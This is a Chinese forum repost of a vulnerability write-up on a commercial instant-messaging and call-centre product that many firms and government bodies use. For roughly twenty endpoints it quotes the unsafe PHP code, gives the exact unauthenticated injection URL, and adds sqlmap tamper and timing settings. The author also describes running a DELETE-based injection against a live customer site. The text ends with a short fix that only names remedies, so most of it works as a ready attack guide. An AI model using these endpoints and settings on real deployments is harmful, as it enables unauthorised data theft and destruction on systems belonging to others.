HanDs
管理员

[7月漏洞公开] 集时通讯程序挖掘之SQL注射打包 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

好好学习才能天天向上。

详细说明:

厂家地址:http://**.**.**.**,有多家分公司. 案例有些可以看这:http://**.**.**.**/bugs/wooyun-2010-0134587

1.png

厂家案例众多,各大企业,政府。。。。



1.漏洞位置:userweb/php/index/user.class.php

此套程序默认环境开了GPC,所以我们把重点放在了不受单引号保护的位置.



code 区域
public function showselectExten( )
{
$db = $this->loadDB( );
$pid = empty( $_REQUEST['depart_id'] ) ? "" : $_REQUEST['depart_id'];
$exten_list = $this->getUsersByDeparts( $pid );
$this->Tmpl['exten_list'] = $exten_list;
$this->display( );
}





关注点在$pid参数,然后我们跟进getUsersByDeparts函数看看

此函数位置在基类:



code 区域
public function getUsersByDeparts( $pdepart_id )
{
$db = $this->loadDB( );
$pdepart_ids = $this->getCdepart_id( $pdepart_id );
$pdepart_ids = substr( $pdepart_ids, 0, -1 );
if ( empty( $pdepart_id ) )
{
$sql = "SELECT * FROM org_user";
}
else
{
$sql = "SELECT * FROM org_user WHERE dept_id in (".$pdepart_ids.") ";
}
$rs = $db->Execute( $sql );
$users = array( );
while ( !$rs->EOF )
{
$users[] = $rs->fields;
$rs->MoveNext( );
}
return $users;
}





$pdepart_ids = $this->getCdepart_id( $pdepart_id );看到此处参数$pdepart带进函数gerCdepart_id我们继续跟进函数getCdepart_id:



code 区域
public function getCdepart_id( $pdepart_id )
{
$db = $this->loadDB( );
global $pdepart_id_str;
$sql = "SELECT dept_id FROM org_department WHERE dept_parent='".$pdepart_id."'";
$rs = $db->Execute( $sql );
while ( $rs && !$rs->EOF )
{
$this->getCdepart_id( $rs->fields['dept_id'] );
$rs->MoveNext( );
}
$pdepart_id_str .= $pdepart_id.",";
return $pdepart_id_str;
}





对我们没啥影响,只是在$pdepart_id后面加了个逗号而已。现在我们回到函数getUsersByDeparts():

漏洞位置出现在:

code 区域
$sql = "SELECT * FROM org_user WHERE dept_id in (".$pdepart_ids.") ";



大部门函数都调用了$this->publicCheckLogin( );验证权限,然后此处没写这函数,所以可以无需登陆直接访问。构造url如下:



/userweb/index.php?module=user&action=selectExten&depart_id=1



1.png





此套系统默认配置的为dba权限,我们丢入sqlmap



2.png



3.png





2.漏洞文件位置:

Userweb/php/outbound/ajax.class.php



code 区域
public function showGetQuestion( )
{
$qnid = $_REQUEST['qnid'];
$array = array( );
$array = $this->getQuestionList( $qnid );
echo json_encode( $array );
exit( );
}

$qnid可控,看getQuestionList函数:

protected function getQuestionList($qnid) {
$db = $this->loadDB();
$sql = "select * from stdout_question where is_deleted=0 and qnid=$qnid order by orderid asc";
$rs = $db->Execute($sql);
$list = array();
while (!$rs->EOF) {
$list[$rs->fields['id']] = $rs->fields;
$rs->MoveNext();
}
return $list;
}





直接带入了sql语句,且不受单引号保护,无视GPC,构造URL:



userweb/outbound.php?module=ajax&action=GetQuestion&qnid=1



5.png



6.png







3.漏洞文件位置:

Userweb/php/outbound/ajax.class.php



code 区域
public function showGetQuestionOptions( )
{
$qid = $_REQUEST['qid'];
$array = array( );
$array = $this->getQuestionOptionList( $qid );
echo json_encode( $array );
exit( );
}





查看getQuestionOptionList函数



code 区域
protected function getQuestionOptionList($qid) {
$db = $this->loadDB();
$sql = "select * from stdout_question_options where qid=$qid order by id asc";
$rs = $db->Execute($sql);
$list = array();
while (!$rs->EOF) {
$list[] = $rs->fields;
$rs->MoveNext();
}
return $list;
}





跟上面类似,构造URL:

userweb/outbound.php?module=ajax&action=GetQuestionOptions&qid=1



8.png



9.png





4.漏洞文件位置:

Userweb/php/outbound/ajax.class.php



code 区域
public function showGetObjectList( )
{
$db = $this->loadDB( );
$object_id = $_REQUEST['object_id'];
$type = $_REQUEST['type'];
if ( empty( $object_id ) )
{
echo "0";
exit( );
}
$list = $this->getObjectList( $object_id, $type );
echo json_encode( $list );
exit( );
}





查看getObjectList函数



code 区域
protected function getObjectList($pid, $type = '') {
$db = $this->loadDB();

$where = " WHERE o.pid={$pid} AND o.is_hide=0";
if ('import' == $type) {
$where .= " AND o.run_status<>'run' ";
} else if ('preview' == $type) {
$where .= " AND (o.type1='preview' OR o.run_status<>'run') ";
} else if ('myPreview' == $type) {
$where .= " AND o.type1='preview' AND o.run_status<>'pause' ";
} else if ('forecast' == $type) {
$where .= " AND o.type1='forecast' ";
} else if ('ivr' == $type) {
$where .= " AND o.type1='ivr' ";
} else if ('quality' == $type) {
$where .= " AND o.qpid>0 ";
} else if ('question' == $type) {
$where .= " AND o.qnid>0 ";
}

if ($_SESSION['userinfo']['power'] != 1) {
$user = $this->getLocalUser();
$where .= " AND (FIND_IN_SET('" . $user['dept_id'] . "', o.visit_dept) OR o.visit_dept='')";
}

if ('myPreview' === $type) {
$extension = $_SESSION['userinfo']['extension'];
$sql = "SELECT object_id FROM stdout_agent_object WHERE extension='{$extension}' AND parent_status!='pause'";
$sql = "SELECT o.id, o.name, o.type1 FROM stdout_object o INNER JOIN ({$sql}) ao ON o.id=ao.object_id {$where} ORDER BY o.id DESC";
} else {
$sql = "SELECT o.id, o.name, o.type1 FROM stdout_object o {$where} ORDER BY o.id DESC";
}
if (!$rs = $db->Execute($sql)) {
echo $sql . "<br/>";
echo $db->ErrorMsg();
exit();
}
$list = array();
while (!$rs->EOF) {
$list[$rs->fields['id']] = $rs->fields;
$rs->MoveNext();
}
return $list;
}





一样的问题,构造URL如下:

userweb/outbound.php?module=ajax&action=GetObjectList&object_id=1



10.png



11.png





5.漏洞文件位置:

Userweb/php/outbound/ajax.class.php



code 区域
public function showGetProductClass( )
{
$db = $this->loadDB( );
$parentid = $_REQUEST['parentid'];
if ( empty( $parentid ) )
{
echo "0";
exit( );
}
$list = $this->getProductClass( $parentid );
echo json_encode( $list );
exit( );
}





跟进getProductClass()函数



code 区域
protected function getProductClass($parentid = 0) {
$db = $this->loadDB();

$sql = "SELECT classid, classname FROM stdout_product_class WHERE parentid={$parentid} ORDER BY orderid ASC, classid DESC";
$rs = $db->Execute($sql);
$list = array();
while (!$rs->EOF) {
$list[$rs->fields['classid']] = $rs->fields;
$rs->MoveNext();
}
return $list;
}





一样的问题,很明显,构造URL如下:

userweb/outbound.php?module=ajax&action=GetProductClass&parentid=1



12.png



13.png







1.漏洞文件位置:

Userweb/php/outbound/ajax.class.php





code 区域
public function showGetCanAdjustExten( )
{
$db = $this->loadDB( );
$dept_id = $_REQUEST['dept_id'];
$sql = "SELECT * FROM org_department";
$dept = $db->GetAll( $sql );
$list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
$list_depart .= "{$dept_id}";
$arrFilterExtensions = array( );
$filter_extensions = $_REQUEST['filter_extensions'];
if ( !empty( $filter_extensions ) )
{
$arrFilterExtensions = explode( ",", $filter_extensions );
}
$arrFilterExtensions = array_unique( $arrFilterExtensions );
$filter_extensions = implode( ",", $arrFilterExtensions );
$filter_extensions = numbertostring4sql( $filter_extensions );
$sql = "SELECT extension, user_name FROM org_user WHERE dept_id in (".$list_depart.") AND extension!='' AND extension IS NOT NULL";
if ( !empty( $filter_extensions ) )
{
$sql .= " AND extension NOT IN (".$filter_extensions.")";
}
$list = $db->GetAll( $sql );
echo json_encode( $list );
exit( );
}





构造URL:

userweb/outbound.php?module=ajax&action=GetCanAdjustExten&dept_id=1



1.png



2.png





2.漏洞文件位置:

Userweb/php/index/index.class.php



code 区域
public function showAjaxGetExtensByDept( )
{
$db = $this->loadDB( );
$dept_id = $_REQUEST['dept_id'];
$sql = "SELECT * FROM org_department";
$dept = $db->GetAll( $sql );
$list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
$list_depart .= "{$dept_id}";
$sql = "SELECT * FROM org_user WHERE dept_id in (".$list_depart.")";
$rs = $db->Execute( $sql );
......................................................





构造URL如下:

userweb/index.php?module=index&action=AjaxGetExtensByDept&dept_id=1



3.png



4.png







3.漏洞文件位置:

Userweb/php/index/index.class.php



code 区域
public function showGetExtensionComboByDept( )
{
$db = $this->loadDB( );
$dept_id = $_REQUEST['dept_id'];
$sql = "SELECT * FROM org_department";
$dept = $db->GetAll( $sql );
$list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
$list_depart .= "{$dept_id}";
$sql = "SELECT extension, user_name FROM org_user WHERE dept_id in (".$list_depart.")";
$rs = $db->Execute( $sql );
..................................................................





构造URL如下:

userweb/index.php?module=index&action=GetExtensionComboByDept&dept_id=1



5.png



6.png







4.漏洞文件位置:

Userweb/php/index/log.class.php



code 区域
public function showExportword( )
{
$userinfo = $_SESSION['userinfo'];
$author_id = $userinfo['extension'];
$sql = "select a.log_id,a.date,log_type,log_title,log_content from crm_oa_worklog a left join crm_oa_log_attachments b on a.log_id=b.log_id";
$start_time = strtotime( $_POST['start_date'] );
$end_time = strtotime( $_POST['end_date'] );
.....................................省略无关代码
if ( $_POST['log_type'] != 0 )
{
$log_type = "`log_type` = ".$_POST['log_type'];
}
....................................省略无关代码
$sql .= " group by a.log_id order by a.date desc ";
$db = $this->loadDB( );
...............................................







POST型注入,且不受单引号保护,无视GPC。。

构造URL如下:



7.png



抓包丢入sqlmap跑

8.png



9.png



10.png







5.漏洞文件位置:

Userweb/php/index/log.class.php



code 区域
public function showExport_com_word( )
{
$filename = "������־".date( "Y-m-d", time( ) ).".doc";
header( "Content-type:application/vnd.ms-word" );
header( "Content-Disposition:filename=".$filename );
$sql = "select a.log_id,a.date,log_type,log_title,log_content from crm_oa_worklog a left join crm_oa_log_attachments b on a.log_id=b.log_id";
$start_time = strtotime( $_POST['start_date'] );
$end_time = strtotime( $_POST['end_date'] );
.......................................................................省略无关代码
if ( $_POST['log_type'] != 0 )
{
$log_type = "`log_type` = ".$_POST['log_type'];
}
.......................................................................







11.png





抓包丢入sqlmap跑



12.png



13.png







6.漏洞文件位置:

Userweb/php/index/Outbound.class.php





code 区域
public function showAjaxOptions( )
{
varfilter( $_REQUEST );
extract( $_REQUEST );
if ( isset( $_REQUEST['topic_id'], $_REQUEST['topic_id'] ) )
{
echo 0;
exit( );
}
$db = $this->loadDB( );
$sql = "SELECT * FROM out_question_topic WHERE id=".$topic_id;
$row = $db->GetRow( $sql );
...................................................





PHP在linux下是区分大小写的,varfilter函数程序员写成了小写,原本是varFilter的,所以。。。。



构造url如下:

userweb/index.php?module=Outbound&action=AjaxOptions&topic_id=1



14.png



15.png







1.漏洞文件位置:

Userweb/php/outbound/agent.class.php



code 区域
function showNo()
{
$db = $this->loadDB();

$object_id = varFilter($_REQUEST['object_id']);

$sql = "select content from stdout_object where id=$object_id";
$content = $db->GetOne($sql);

$this->Tmpl['content'] = varResume($content);

$this->display();
}





这里看到$_REQUEST[‘object_id’]经过了函数varFilter,我们跟进看看:



code 区域
function varFilter( $fArray )
{
if ( is_array( $fArray ) )
{
foreach ( $fArray as $_arrykey => $_arryval )
{
if ( is_string( $_arryval ) )
{
$fArray[$_arrykey] = trim( nl2br( $fArray[$_arrykey] ) );
$fArray[$_arrykey] = htmlspecialchars( $fArray[$_arrykey] );
$fArray[$_arrykey] = !get_magic_quotes_gpc( ) ? addslashes( $fArray[$_arrykey] ) : $fArray[$_arrykey];
$fArray[$_arrykey] = strip_tags( $fArray[$_arrykey], "<br>" );
}
else if ( is_array( $_arryval ) )
{
$fArray[$_arrykey] = varfilter( $_arryval );
}
}
return $fArray;
}
$fArray = trim( nl2br( $fArray ) );
$fArray = htmlspecialchars( $fArray );
$fArray = !get_magic_quotes_gpc( ) ? addslashes( $fArray ) : $fArray;
$fArray = strip_tags( $fArray, "<br>" );
return $fArray;
}





主要就是一个GPC,然后看我们的漏洞语句:

code 区域
$sql = "select content from stdout_object where id=$object_id";





不受单引号保护,因此逃避了GPC,大多函数都调用了$this->publicCheckLogin();函数检测是否登陆,然后有些估计是漏写了,造成我们可以无需登陆直接访问。此处是盲注,因为htmlspecialchars过滤了< >等,我们在丢进sqlmap跑的时候需要加上--tamper=between --time-sec=5这样 不然只能跑出证明,跑不出数据。



构造url如下:

userweb/outbound.php?module=agent&action=No&object_id=1



1.png



2.png







2.漏洞文件位置:

Userweb/php/outbound/agent.class.php



code 区域
public function showEditTask()
{
$db = $this->loadDB();
$_REQUEST = varFilter($_REQUEST);
extract($_REQUEST);
//无关紧要代码省略...............
$sql = "SELECT SQL_NO_CACHE customer_id, call_status FROM {$table} WHERE id={$task_id}";
$rowTask = $db->GetRow($sql);
if (!$rowTask) exit('error.');
...................................





这里利用变量覆盖:



code 区域
$_REQUEST = varFilter($_REQUEST);
extract($_REQUEST);





原因在这,我们可以直接通过GET请求table=stdout_task&task_id=2,将$table玉$task_id覆盖掉.

同样的盲注,这里不受单引号保护:

code 区域
$sql = "SELECT SQL_NO_CACHE customer_id, call_status FROM {$table} WHERE id={$task_id}";





要注意的就是$table必须是个存在customer_id, call_status字段的表,不然也是出不来数据.这里我的构造URL如下:



userweb/outbound.php?module=agent&action=EditTask&table=stdout_task&task_id=1



3.png



4.png







3.漏洞文件位置:

Userweb/php/outbound/agent.class.php



code 区域
public function showQuestion()
{
$db = $this->loadDB();

$_REQUEST = varFilter($_REQUEST);
extract($_REQUEST);
if (empty($qnid)) {
goBack(c('²Ù×÷ʧ°Ü£º´«²Îqnid´íÎó.'), 'exit');
}
$row_qn = $this->getQn($qnid);
............................................





进入基类查看getQn函数/php/outbound/public.class.php



code 区域
function getQn($qnid)
{
$db = $this->loadDB();
$sql = "select * from stdout_qn where id=$qnid";
$row = $db->GetRow($sql);
return $row;
}





一样$qnid不受单引号保护,且我们可以通过extract($_REQUEST);覆盖$qnid。

构造URL如下:



地址userweb/outbound.php?module=agent&action=Question&qnid=12



5.png



6.png







4.漏洞文件位置:

Userweb/php/outbound/agent.class.php





code 区域
function showAjaxCheckNextQuestion()
{
$db = $this->loadDB();
$qid = varFilter($_REQUEST['qid']);
$qnid = varFilter($_REQUEST['qnid']);
$answer = varFilter($_REQUEST['answer']);
$row_question = $this->getQuestion($qid);
echo $this->isExistNextQuestion($row_question, true, $answer) ? 'true' : 'false';
}





直接看getQuestion函数:



code 区域
protected function getQuestion($qid)
{
$db = $this->loadDB();
$sql = "select * from stdout_question where id=$qid and is_deleted=0";
$row = $db->GetRow($sql);
return $row;
}







依然构造URL:

地址:userweb/outbound.php?module=agent&action=AjaxCheckNextQuestion&qid=1



7.png



8.png









1.漏洞文件位置:

Userweb/php/outbound/object.class.php



code 区域
function showObjectPause() {
$exten_object_id = varFilter($_REQUEST['id']);
$db = $this->loadDB();
$sql = "select object_id, run_status from stdout_exten_object where id={$exten_object_id}";
.........................................//省略





varFilter函数:



code 区域
function varFilter( $fArray )
{
if ( is_array( $fArray ) )
{
foreach ( $fArray as $_arrykey => $_arryval )
{
if ( is_string( $_arryval ) )
{
$fArray[$_arrykey] = trim( nl2br( $fArray[$_arrykey] ) );
$fArray[$_arrykey] = htmlspecialchars( $fArray[$_arrykey] );
$fArray[$_arrykey] = !get_magic_quotes_gpc( ) ? addslashes( $fArray[$_arrykey] ) : $fArray[$_arrykey];
$fArray[$_arrykey] = strip_tags( $fArray[$_arrykey], "<br>" );
}
else if ( is_array( $_arryval ) )
{
$fArray[$_arrykey] = varfilter( $_arryval );
}
}
return $fArray;
}
$fArray = trim( nl2br( $fArray ) );
$fArray = htmlspecialchars( $fArray );
$fArray = !get_magic_quotes_gpc( ) ? addslashes( $fArray ) : $fArray;
$fArray = strip_tags( $fArray, "<br>" );
return $fArray;
}







限制是htmlspecialchars和GPC,此处没单引号保护,无视GPC。Sqlmap跑的时候记得加上--tamper=between,不然跑不出数据.



构造URL如下:

userweb/outbound.php?module=object&action=ObjectPause&id=1



1.png



2.png





2.漏洞文件位置:

Userweb/php/outbound/object.class.php



code 区域
function showObjectStop() {
$exten_object_id = varFilter($_REQUEST['id']);
$db = $this->loadDB();
$sql = "select object_id, run_status from stdout_exten_object where id={$exten_object_id}";
........................................//省略





跟上面一样的问题:

构造url如下:

userweb/outbound.php?module=object&action=ObjectStop&id=1



3.png



4.png







3.漏洞文件位置:

Userweb/php/outbound/report.class.php



code 区域
function showAjaxGetIvrTotal()
{
$db = $this->loadDB();
$_REQUEST = varFilter($_REQUEST);
$object_id = $_REQUEST['object'];
$ivr_id = $_REQUEST['ivr_id'];
$fromdate = $_REQUEST['fromdate'];
$todate = $_REQUEST['todate'];
..................................../省略无关代码
$sql = "SELECT * FROM ss_ivr_dests WHERE ivr_id={$ivr_id} ORDER BY selection ASC";
$rs = $db->GetArray($sql);







构造URL:userweb/outbound.php?module=report&action=AjaxGetIvrTotal&ivr_id=1



5.png



6.png







4.漏洞文件位置:

Userweb/php/index/crmManager.class.php



code 区域
public function showAjaxGetTransferLogDetail( )
{
$db = $this->loadDB( );
$sql = "SELECT content FROM log_customer_transfer WHERE id=".$_REQUEST['id'];
$content = $db->GetOne( $sql );
$content = str_replace( "\r\n", "<br/>", $content );
echo $content;
exit( );
}







构造URL如下:

userweb/index.php?module=crmManager&action=AjaxGetTransferLogDetail&id=1



7.png



8.png







5.漏洞文件位置:

Userweb/php/index/fieldConfig.class.php



code 区域
function showeditField(){
if( isset($_GET['id']) && !empty( $_GET['id'] ) ){
$id = $_GET['id'];
}else{
goBack("来路不明","close");
}
$db = $this->loadDB();
$sql = "SELECT * FROM crm_fields_options WHERE id=".$id;
$field = $db->GetRow( $sql );
$this->Tmpl['field'] = $field;
$this->display();
}







构造URL如下:

userweb/index.php?module=fieldConfig&action=editField&id=1



9.png



10.png









Userweb/php/index/log.class.php



code 区域
public function showDelete( )
{
$str = $_GET['delete_str'];
$mark = $_GET['mark'];
$str = substr_replace( $str, "", -1, 1 );
$array = explode( ",", $str );
$j = count( $array );
$db = $this->loadDB( );
$i = 0;
for ( ; $i < $j; ++$i )
{
$sqll = "select filename,date from crm_oa_log_attachments where log_id='".$array[$i]."'";
$result = mysql_query( $sqll );
while ( $row = mysql_fetch_array( $result ) )
{
$row['date'] = date( "Ym", $row['date'] );
$filename = "data/diary/".$row['date']."/".$row['filename'];
@unlink( $filename );
}
}
$sql = "DELETE FROM `crm_oa_worklog` WHERE `log_id` in (".$str.")";
$sq = "DELETE FROM `crm_oa_log_attachments` WHERE `log_id` in (".$str.")";
$s = "delete from `crm_oa_log_comments` where `log_id` in (".$str.")";
if ( $db->Execute( $sql ) && $db->Execute( $sq ) && $db->Execute( $s ) )
{
goback( c( "ɾ���ɹ���" ), "index.php?module=log&action=".$mark );
}
else
{
goback( c( "ɾ��ʧ��!" ) );
}
}







参数delete_str,因为不适合在本地搭建,就在案例上跑的,提前看了,表都是空的。不然这delete注入跑起来会完蛋的.



构造url如下:

userweb/index.php?module=log&action=Delete&delete_str=1



1.png



2.png







2.漏洞文件位置:

Userweb/php/index/mobileApi.class.php



code 区域
public function showGetSessionsByImUser( )
{
$loginId = trim( $_REQUEST['loginId'] );
$db_mobile = $this->loadDBMobile( );
$db_mobile->Execute( "SET NAMES UTF8" );
$sql = "call proc_im_getsessions(".$loginId.");";
$res = $db_mobile->Execute( $sql );
....................................................





构造url如下:userweb/index.php?module=mobileApi&action=GetSessionsByImUser&loginId=1



3.png



4.png







3.漏洞文件位置:

Userweb/php/index/Outbound.class.php



code 区域
public function showAjaxTopic( )
{
varfilter( $_REQUEST );
extract( $_REQUEST );
$db = $this->loadDB( );
if ( isset( $_REQUEST['ques_id'], $_REQUEST['ques_id'] ) )
{
echo 0;
exit( );
}
if ( isset( $_REQUEST['topic_id'], $_REQUEST['topic_id'], $_REQUEST['parent_topic_id'], $_REQUEST['parent_topic_id'] ) )
{
echo 0;
exit( );
}
$sql = "SELECT id FROM out_question_answer WHERE task_id=".$task_id." AND ques_id={$id} AND custom_contact='{$number}'";
$quAnsId = $db->GetOne( $sql );
$sql = "SELECT * FROM out_question_answer_context\r\n\t\t\t\tWHERE task_id=".$task_id." AND ques_id={$id} AND topic_id={$topic_id} AND ques_ans_id={$quAnsId}";
$answerRow = $db->GetRow( $sql );
if ( isset( $_REQUEST['parent_topic_id'], $_REQUEST['parent_topic_id'] ) )
{
$sql = "SELECT * FROM out_question_topic\r\n WHERE ques_id=".$ques_id." AND parent_topic_id={$parent_topic_id} AND parent_option='{$parent_option}'";
$row = $db->GetRow( $sql );
if ( !empty( $row ) )
{
$row['m'] = $method;
$row['parent_id'] = 1;
$row['answer'] = $answerRow['option_context'];
$row['other_answer'] = $answerRow['other_answer'];
echo json_encode( $row );
exit( );
}
}
$sql = "SELECT * FROM out_question_topic WHERE id=".$topic_id." AND ques_id={$ques_id}";
$row = $db->GetRow( $sql );
$row['m'] = $method;
$row['parent_id'] = 0;
$row['answer'] = $answerRow['option_context'];
$row['other_answer'] = $answerRow['other_answer'];
echo json_encode( $row );
exit( );
}







extract( $_REQUEST );此函数造成变量覆盖。

构造url如下:

userweb/index.php?module=Outbound&action=AjaxTopic&ques_id=1&topic_id=1&parent_topic_id=1&task_id=1



5.png



6.png





同样的还有参数,id,topic_id,parent_topic_id,ques_id四处..





4.漏洞文件位置:

Userweb/php/index/seatMonitor.class.php





code 区域
function showDaPingNotify()
{

$db = $this->loadDB();
$id_array = array();
$id = $_REQUEST['id'];
$id_array = explode(",",$id);
//»ñÈ¡ÄÚÈݹ«¸æ
$sql = "SELECT * FROM crm_notify where nid in (".$id.")";
$tmp_result = $db->GetAll( $sql );

........................................................







构造url如下:

userweb/index.php?module=seatMonitor&action=DaPingNotify&id=1



7.png



8.png















漏洞证明:

4.png



7.png

修复方案:

补上登陆验证函数,加强参数过滤,注意单引号保护.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
时蓖ㄑ
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复